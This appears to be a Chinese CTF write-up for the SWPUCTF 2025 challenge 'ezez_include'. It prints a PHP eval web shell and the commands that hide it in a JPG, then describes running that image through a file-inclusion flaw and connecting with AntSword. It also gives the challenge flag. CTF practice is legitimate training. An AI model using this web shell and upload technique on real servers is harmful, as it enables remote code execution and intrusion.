题目来源:NSSCTF

练习时间:2026年2月3日

练习数量:1

上篇:CTF-SWPUCTF2025秋季新生赛3
下篇:CTF-SWPUCTF2025秋季新生赛5

📖 SWPUCTF 2025 秋季新生赛合集
1️⃣CTF-SWPUCTF2025秋季新生赛1
2️⃣CTF-SWPUCTF2025秋季新生赛2
3️⃣CTF-SWPUCTF2025秋季新生赛3
4️⃣CTF-SWPUCTF2025秋季新生赛4
5️⃣CTF-SWPUCTF2025秋季新生赛5


⭐️ 13 [SWPUCTF 2025 秋季新生赛]ezez_include

🚩flag:NSSCTF{0bcf4985-3ef7-4664-9e7a-b864ee217ce2}

💡hint:WEB 文件上传 文件包含 目录扫描

🔧tool:antsword dirsearch

文件包含漏洞LFI:应用程序在未对用户可控输入进行严格校验的情况下,将其用于文件包含操作,导致攻击者能够读取或执行服务器上的本地文件的安全漏洞。

目录扫描工具dirsearch的下载:https://github.com/maurosoria/dirsearch

基本使用方法(示例):

python3 dirsearch.py -u http://node1.anna.nssctf.cn:20739

扫描结果:
目录扫描结果
访问/upload.php/
访问结果

制作一句话图片马方法:

<?php eval($_POST['cmd']); ?>

然后找到一张图片tp.jpg

copy tp.jpg/b+muma.php shell.jpg

在linux系统中的命令是:

cat tp.jpg muma.php > shell.jpg

制作出的shell图片:
制作出的shell图片
上传成功:
shell.jpg上传成功
后续其实用的是muma.jpg(直接改了后缀)

在index.php界面读取upload/{你上传的文件}.jpg
发现确实以php格式运行
访问完成后,可以用蚁剑。
具体配置如下:


最后在根目录找到了flag: